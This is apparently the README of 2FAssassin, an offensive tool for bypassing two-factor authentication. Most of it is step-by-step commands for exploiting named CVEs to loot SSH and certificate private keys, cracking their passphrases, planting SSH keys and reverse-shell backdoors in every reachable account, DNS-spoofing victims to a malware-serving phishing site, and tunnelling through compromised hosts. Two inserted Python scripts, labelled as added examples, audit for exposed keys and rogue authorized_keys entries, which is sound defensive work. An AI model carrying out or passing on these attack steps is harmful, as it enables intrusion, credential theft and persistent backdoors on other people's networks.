sashka3076/2FAssassin
## Preamble ##
- The code changes from time to time; run `git pull` before using the tool.
## Intro ##
- The effectiveness of two-factor authentication depends on how well a user protects "something only the user has".
- The tool attempts to obtain OTPs and private keys using various methods.
- Private keys can be extracted from client certificates and cracked, then used for authentication.
- The tool exploits common vulnerabilities that cause private keys to leak.
- It propagates the compromise from a single machine to entire networks using the looted private keys.
## Features ##
```text
root@kali:~/2fassassin# python assassin.py -h
___ ___ _ _
|_ ) __/_\ ______ __ _ _____(_)_ _
/ /| _/ _ \ (_-<_-</ _` (_-<_-< | ' \+v2
/___|_/_/ \_\/__/__/\__,_/__/__/_|_||_|
usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN]
                   [--check CHECK] [--cert CERT] [--filetype FILETYPE]
                   [--user USER] [--user2 USER2] [--secret SECRET]
                   [--spoof SPOOF] [--gateway GATEWAY] [--mitm MITM]
                   [--host HOST] [--mode MODE] [--auto AUTO] [--post POST]
                   [--db DB] [--key KEY] [--log LOG] [--tunnel TUNNEL]
                   [--chain CHAIN]

Bypass 2FA - SMS, Voice, SSH

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      IP Address
  --silent             reduce output verbosity
  --scan SCAN          Network enumeration { basic | advanced }
  --check CHECK        Check for vulnerabilities, modules
  --cert CERT          Certificate management
  --filetype FILETYPE  Specify file *.extension
  --user USER          username
  --user2 USER2        username2
  --secret SECRET      password
  --spoof SPOOF        spoof
  --gateway GATEWAY    gateway
  --mitm MITM          mitm
  --host HOST          server ip
  --mode MODE          mode
  --auto AUTO          auto mode for automation
  --post POST          post modules
  --db DB              Manage your trophies.
  --key KEY            keys management
  --log LOG            View logs
  --tunnel TUNNEL      Create ssh tunnel with looted private keys
  --chain CHAIN        The amount of connecting chain
```
## Example Usage ##
- Network enumeration:

```sh
./assassin.py --scan <basic | advanced> --target <ip_address | range>
./assassin.py --scan advanced --target 192.168.0.0/24
./assassin.py --scan basic --target 192.168.2.40
```

### Automatic Mode ###
* Check everything (common vulnerabilities) that causes the private keys to leak out.

```sh
./assassin.py --check auto --mode attack
```
```text
Network Enumeration
        |
        | Building Target Database
        v
+----------------------------------------------------------------------------+
|SSH-based Attacks                                                           |
|ShellShock                                                                  |
|HeartBleed                                                                  |
|Ceragon FibeAir IP-10 SSH Private Key Exposure                              |
|ExaGrid Known SSH Key and Default Password                                  |
|F5 BIG-IP SSH Private Key Exposure                                          |
|Loadbalancer.org Enterprise VA SSH Private Key                              |
|Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution|
|Quantum DXi V1000 SSH Private Key Exposure                                  |
+----------------------------------------------------------------------------+
        |
        | POST Modules
        v
Keys Extraction
        |
        | Looted Keys
        v
Key-based Authentication
```
### Manual Mode ###
* SSH-based attacks to get private keys:

```sh
./assassin.py --check ssh --mode attack
```

* HeartBleed attacks to get private keys:

```sh
./assassin.py --check heartbleed --mode attack
```

* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936

```sh
./assassin.py --check ceragon --mode attack
```

* ExaGrid Known SSH Key and Default Password: CVE-2016-1560

```sh
./assassin.py --check exagrid --mode attack
```

* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493

```sh
./assassin.py --check f5 --mode attack
```

* Loadbalancer.org Enterprise VA SSH Private Key

```sh
./assassin.py --check loadbalancer --mode attack
```

* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution

```sh
./assassin.py --check array --mode attack
```

* Quantum DXi V1000 SSH Private Key Exposure

```sh
./assassin.py --check quantum --mode attack
```

* Check and disable two-factor authentication:

```sh
./assassin.py --check config --mode attack
```

### Post Mode ###
* Once you have looted the private keys, perform key-based authentication against all targets in the database:

```sh
./assassin.py --check ssh --mode auth
```
### Certificate Handling ###
```text
#4
Remove Passphrase <---------------------------+
+ |
| |
| #3 |
| Parsing Cracked Passphrase |
| |
Analyze Certificate | |
+ v |
| |
| +---------------------------+ |
| | | +
#1 +----------> | ^^^^^^^^^^^^^^^^^^^^^ | <---------+ Getting Passphrase
| PKCS#12 Certificate | { Cracking | Stealing }
| ^^^^^^^^^^^^^^^^^^^^^ | #2
| |
+----------+-----+----------+
| | keep for later use <--------+
| | :) |
| | |
| | |
#5 | | #6 |
Extract Public Key <----------------+ +--------------------> Extract Private Key+
+
|
v #10
Validate Domain #7 Authenticate to SSL Server <-------+
+ |
| |
v #9 |
Real Domain Hunting +----------------> Prepare Client Machine +--------------------+
#8 +----------------------------+ SSL/HTTPS
| Loading Client|Certificate |
+----------------------------+
```
* Look for potential certificate files (they contain private keys!):

```sh
./assassin.py --cert analyze --filetype pfx
```

* Crack PKCS#12 passphrases:

```sh
# Dictionary attack using a wordlist
./assassin.py --cert crack --mode dic --filetype pfx
# Pure brute force with mutation
./assassin.py --cert crack --mode bruteforce --filetype pfx
```

* Dissect the certificate file, remove the passphrase and hunt for the correct domain (target server):

```sh
./assassin.py --cert dissect --filetype pfx
```

* Prepare the client machine, install the cracked certificate and authenticate to the SSL server:

```sh
./assassin.py --cert windows --user <username> --secret <password> --host <client_machine_ip>
```
```text
#2 Loads client-certificate
+-----------------+ +----------------+ +------------------+
| Attacker Machine| | Windows Client | | SSL Website |
| (2FAssassin) +---------> |(172.16.173.180)+-----------------> | (172.16.173.182) |
+-----------------+ +----------------+ +------------------+
Sends client-certificate, instruction script Authenticates to remote SSL website
#1 #3
```
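The analyze step above hunts for PKCS#12 and PEM files precisely because they carry private keys. The following script is an added example, not part of 2FAssassin, showing the defender-side audit of the same material: it walks a directory tree and reports every file that contains private key material, distinguishing passphrase-protected keys from unprotected ones, so such files can be moved into proper key storage or deleted before anyone loots them. It uses only the Python standard library. The PKCS#12 check is a heuristic that scans the DER for the keyBag and pkcs8ShroudedKeyBag OIDs of RFC 7292 (OpenSSL's default export leaves the shrouded key bag in an unencrypted SafeContents, so the OID is visible even though the key itself is encrypted); the sample files it writes are constructed stand-ins, not real keys.

```python
"""Audit a directory tree for files that carry private key material (added example)."""
import base64
import os
import re
import tempfile

# DER encodings of the PKCS#12 bag-type OIDs (RFC 7292 section 4.2).
PKCS12_KEY_BAG_OIDS = {
    bytes.fromhex("060b2a864886f70d010c0a0101"): "keyBag (unencrypted private key)",
    bytes.fromhex("060b2a864886f70d010c0a0102"): "pkcs8ShroudedKeyBag (passphrase-protected private key)",
}

# PEM private key blocks: PKCS#1/SEC1 ("RSA"/"EC"/"DSA"), PKCS#8 ("" / "ENCRYPTED") and OpenSSH.
PEM_KEY_RE = re.compile(
    rb"-----BEGIN ((?:ENCRYPTED |RSA |EC |DSA |OPENSSH )?PRIVATE KEY)-----\r?\n(.*?)-----END \1-----",
    re.S,
)
OPENSSH_UNENCRYPTED_PREFIX = b"openssh-key-v1\x00\x00\x00\x00\x04none"  # magic + cipher name "none"


def classify_pem(data):
    """Return a list of (label, protected) for every PEM private key block in data."""
    findings = []
    for m in PEM_KEY_RE.finditer(data):
        label, body = m.group(1).decode(), m.group(2)
        if label == "ENCRYPTED PRIVATE KEY":
            protected = True                       # PKCS#8 encrypted wrapper
        elif b"Proc-Type: 4,ENCRYPTED" in body:
            protected = True                       # legacy OpenSSL PEM encryption header
        elif label == "OPENSSH PRIVATE KEY":
            try:                                   # openssh-key-v1 names its cipher right after the magic
                raw = base64.b64decode(b"".join(body.split()))
                protected = not raw.startswith(OPENSSH_UNENCRYPTED_PREFIX)
            except ValueError:
                protected = False                  # unreadable: report it as exposed rather than hide it
        else:
            protected = False
        findings.append((label, protected))
    return findings


def classify_pkcs12(data):
    """Return descriptions of key bags found in a DER PKCS#12 blob (OID scan heuristic)."""
    if not data.startswith(b"\x30"):               # a PFX is a DER SEQUENCE
        return []
    return [desc for oid, desc in PKCS12_KEY_BAG_OIDS.items() if oid in data]


def scan_tree(root):
    """Walk root and return [{"path", "kind", "protected"}] for every file holding a private key."""
    report = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(4 * 1024 * 1024)  # more than enough for any key container
            except OSError:
                continue
            for label, protected in classify_pem(data):
                report.append({"path": path, "kind": "PEM " + label, "protected": protected})
            for desc in classify_pkcs12(data):
                report.append({"path": path, "kind": "PKCS#12 " + desc, "protected": "Shrouded" in desc})
    return sorted(report, key=lambda r: r["path"])


def build_samples(root):
    """Write constructed sample files (NOT real keys) into root for the demo."""
    rsa_clear = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                 + base64.encodebytes(b"constructed, not a real key" * 4)
                 + b"-----END RSA PRIVATE KEY-----\n")
    rsa_enc = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
               b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
               + base64.encodebytes(b"constructed ciphertext" * 4)
               + b"-----END RSA PRIVATE KEY-----\n")
    openssh_clear = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                     + base64.encodebytes(OPENSSH_UNENCRYPTED_PREFIX + b"\x00" * 40)
                     + b"-----END OPENSSH PRIVATE KEY-----\n")
    # Minimal stand-in for a PFX: a DER SEQUENCE whose content contains the shrouded key bag OID.
    pfx = b"\x30\x82\x00\x20" + bytes.fromhex("060b2a864886f70d010c0a0102") + b"\x00" * 19
    cert_only = b"-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n"
    for name, data in [("id_rsa", rsa_clear), ("backup.key", rsa_enc), ("id_ed25519", openssh_clear),
                       ("client.pfx", pfx), ("ca.crt", cert_only)]:
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)


def demo():
    """Scan the constructed samples; return [(file name, kind, protected)]."""
    with tempfile.TemporaryDirectory() as root:
        build_samples(root)
        findings = scan_tree(root)
        for f in findings:
            state = "passphrase-protected" if f["protected"] else "UNPROTECTED"
            print(f"{os.path.basename(f['path'])}: {f['kind']} [{state}]")
        return [(os.path.basename(f["path"]), f["kind"], f["protected"]) for f in findings]


if __name__ == "__main__":
    demo()
```

Run it against a real tree with `scan_tree("/home")` or similar; unprotected findings are the ones a cracker never needs to touch, and protected ones are only as strong as their passphrase, which is exactly what the dictionary and brute-force modes above go after.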
### Backdoor ###
```text
#4 {add keys}
'2fassassin' +---------> account_1
#1 +-----------+ |
+-------------> |create user| +---------> account_2
| #2 +--------------------+ |
sshkey +-------------> |generate RSA keypair| +---------> account_3
| #3 +------------------------+ |
+-------------> |access to remote server| -------+---------> account_4
+------------------------+ |
+---------> account_5
|
+---------> .........
```
* Add arbitrary SSH keys to all accessible accounts:

```sh
./assassin.py --check sshkey --mode attack
```

* Drop a persistent backdoor (reverse shell) into all accessible accounts:

```sh
./assassin.py --check reverse --mode attack
```
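The backdoor step above plants additional public keys in the authorized_keys files of every account it can reach. As an added example that is not part of 2FAssassin, the Python helper below is the detection counterpart: it audits authorized_keys content against an allowlist of fingerprints the organisation actually issued, parsing each line (including quoted options), computing the OpenSSH SHA256 fingerprint of the key blob, and reporting unknown keys, forced commands and unparseable lines. The authorized_keys text and the key blobs are constructed (the "key bytes" are counters, not real keys); the key-type list and the decision to treat `command=` as notable are this example's choices.

```python
"""Audit authorized_keys lines against a fingerprint allowlist (added example)."""
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com")


def split_options(line):
    """Split an authorized_keys line into (options, rest); options may contain quoted spaces."""
    if line.split(None, 1)[0] in KEY_TYPES:
        return "", line
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            return line[:i], line[i + 1:].lstrip()
    return line, ""


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a raw public key blob (base64 without padding)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def blob_key_type(blob):
    """Key type string embedded in the wire-format blob (first length-prefixed field)."""
    (n,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + n].decode()


def parse_authorized_keys(text):
    """Yield one dict per non-comment line: options, type, fingerprint, comment (or an error)."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options, rest = split_options(line)
        parts = rest.split(None, 2)
        if len(parts) < 2:
            yield {"line": lineno, "error": "unparseable", "raw": raw}
            continue
        try:
            blob = base64.b64decode(parts[1], validate=True)
            declared, embedded = parts[0], blob_key_type(blob)
        except (ValueError, struct.error, UnicodeDecodeError):
            yield {"line": lineno, "error": "bad key blob", "raw": raw}
            continue
        yield {"line": lineno, "options": options, "type": declared,
               "type_mismatch": declared != embedded, "fingerprint": fingerprint(blob),
               "comment": parts[2] if len(parts) > 2 else ""}


def audit(text, allowlist):
    """Return entries needing attention: unknown fingerprints, forced commands, mismatches, errors."""
    findings = []
    for entry in parse_authorized_keys(text):
        reasons = []
        if "error" in entry:
            reasons.append(entry["error"])
        else:
            if entry["fingerprint"] not in allowlist:
                reasons.append("fingerprint not in allowlist")
            if "command=" in entry["options"]:
                reasons.append("forced command set")
            if entry["type_mismatch"]:
                reasons.append("declared key type does not match blob")
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


def make_blob(key_type, key_bytes):
    """Build a wire-format public key blob (constructed stand-in; key_bytes is not a real key)."""
    return (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(key_bytes)) + key_bytes)


KNOWN_BLOB = make_blob("ssh-ed25519", bytes(range(32)))        # constructed: the key we issued
ROGUE_BLOB = make_blob("ssh-ed25519", bytes(range(32, 64)))    # constructed: a planted key

SAMPLE_AUTHORIZED_KEYS = "\n".join([                           # constructed sample file content
    "# constructed sample authorized_keys",
    f"ssh-ed25519 {base64.b64encode(KNOWN_BLOB).decode()} admin@workstation",
    f'command="/tmp/.update -q",no-pty ssh-ed25519 {base64.b64encode(ROGUE_BLOB).decode()} 2fassassin',
    "ssh-rsa not-base64!!! junk",
])


def demo():
    """Audit the constructed sample against an allowlist holding only the issued key."""
    findings = audit(SAMPLE_AUTHORIZED_KEYS, {fingerprint(KNOWN_BLOB)})
    for f in findings:
        print(f"line {f['line']}: {', '.join(f['reasons'])}  {f.get('comment', f.get('raw'))}")
    return findings


if __name__ == "__main__":
    demo()
```

The allowlist is the piece that makes this useful: build it from the public keys you actually issued (`ssh-keygen -lf` prints the same SHA256 form), then run `audit` over every authorized_keys file on a schedule and alert on any finding.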
### Impersonation / Client Side Attacks ###
```text
#1
Server certificate was stolen by attacker
+------------+
| Attacker | <-----------------------------------------------------------+
|(2FAssassin)| |
+----+--+----+ |
| ^ |
| | #7 |
| | reverse shell |
| | connects back |
| | to attacker |
| | |
| | +----------------+ (normal) +---------+--------+
| | | Windows Client | client auth | SSL Website |
| +-------------------+(172.16.173.180)+-----------------> | (172.16.173.182) |
| +----------+-+---+ +------------------+
| ^ |
| #4 | |
| SSL website is now | |
| at 172.16.173.194 | +-------------------------------+ #6
| | | client download
| | #5 | malware from the
| #3 +-----+-----------+ (abnormal) | phishing website
| DNS Spoofing | | client auth |
+-------------------------> | DNS Server | |
| |(172.16.173.191) | |
| | | |
| +-----------------+ |
| |
| +------------------+
+----------------------------------------------------------> | Phishing Website |
#2 Attacker cracked the server certificate, then use it | (172.16.173.194) |
to set up phishing website +------------------+
```
* Set up the phishing website and run the DNS spoofing attack:

```sh
./assassin.py --filetype pfx --spoof <phishing_server_ip> --user <username> --secret <password> --target <victim_ip> --gateway <dns_ip> --mitm <on|off>
```
### Tunnelling ###
* Create an SSH tunnel using looted private keys (the greater the chain value, the longer the SSH tunnel):

```sh
./assassin.py --tunnel ssh --chain 1 --user <username> --secret <password> --user2 <username> --host <server_ip>
./assassin.py --tunnel ssh --chain 2 --user <username> --secret <password> --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2>
./assassin.py --tunnel ssh --chain 3 --user <username> --secret <password> --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2> --user4 <username4> --host3 <server_ip3>
```
### Administration ###
* View activity output:

```sh
./assassin.py --log all
```

* See what you have got (e.g., credentials):

```sh
./assassin.py --log loot
```

* Find out the origin of an SSH user:

```sh
./assassin.py --log whereis --user <username>
```

* Find out which SSH accounts are remotely accessible:

```sh
./assassin.py --log account --host <target_host>
```
### Investigation ###
* Check whether a remote host uses key-based authentication:

```sh
./assassin.py --check pka --mode detect
```

* Find out which machine is hosting the user account:

```sh
./assassin.py --log whereis --user <username>
```

* Find out which accounts can potentially be accessed by a specific user:

```sh
./assassin.py --log account --host <ip_address>
```
## FAQ ##
- Error when launching network enumeration: try loading the `msgrpc` plugin in msfconsole and define the password (e.g., `load msgrpc Pass=abc123`).
- The user "2fassassin" is not found when running `./assassin.py --check sshkey --mode attack`: try creating the user manually:

```sh
# Debian/Kali adduser: the name starts with a digit, so --force-badname is required
# (useradd has no --force-badname option).
adduser --force-badname 2fassassin
su 2fassassin
cd "$HOME"
ssh-keygen -t rsa
```
## Limitations ##
- Development Status :: 2 - Pre-Alpha
- Currently still under active development.
## Copyright ##
2FAssassin - Created and maintained by Maxwell Koh

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.